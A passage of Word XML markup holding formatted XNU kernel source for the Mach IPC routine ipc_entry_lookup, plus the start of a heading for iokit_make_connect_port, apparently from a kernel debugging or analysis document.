      </w:pPr>
      <w:r w:rsidRPr="00CF63B0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(lldb)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD3E41" w:rsidRDefault="00BD3E41" w:rsidP="00CF63B0">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="264"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BD3E41" w:rsidRPr="00BD3E41" w:rsidRDefault="00BD3E41" w:rsidP="00BD3E41">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD3E41">
        <w:t>ipc_entry_lookup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD3E41" w:rsidRPr="00BD3E41" w:rsidRDefault="00BD3E41" w:rsidP="00BD3E41">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/*</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t> *  Routine:    ipc_entry_lookup</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t> *  Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t> *      Searches for an entry, given its name.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t> *  Conditions:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t> *      The space must be read or write locked throughout.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t> *      The space must be active.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t> */</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ipc_entry_t</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ipc_entry_lookup</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ipc_space_t</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>     </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>space</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mach_port_name_t</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>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mach_port_index_t</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>index</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ipc_entry_t</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>entry</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>assert</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>is_active</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>space</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>index</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MACH_PORT_INDEX</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>name</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b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>if</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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>index</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>space</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>is_table_size</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entry</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amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>space</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>is_table</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>index</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b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>if</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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IE_BITS_GEN</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>entry</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ie_bits</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MACH_PORT_GEN</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>name</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IE_BITS_TYPE</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>entry</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ie_bits</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MACH_PORT_TYPE_NONE</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entry</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IE_NULL</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color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    </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b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>else</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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>entry</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IE_NULL</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b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>assert</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>((</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>entry</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IE_NULL</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b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>||</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IE_BITS_TYPE</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>entry</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ie_bits</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>entry</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00981EAC" w:rsidRPr="00BD3E41" w:rsidRDefault="00981EAC" w:rsidP="00981EAC">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>iokit_make_connect_port</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E41">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00981EAC" w:rsidRDefault="00981EAC" w:rsidP="00CF63B0">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="264"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00981EAC" w:rsidRDefault="00981EAC" w:rsidP="00981EAC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MIGEXTERN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
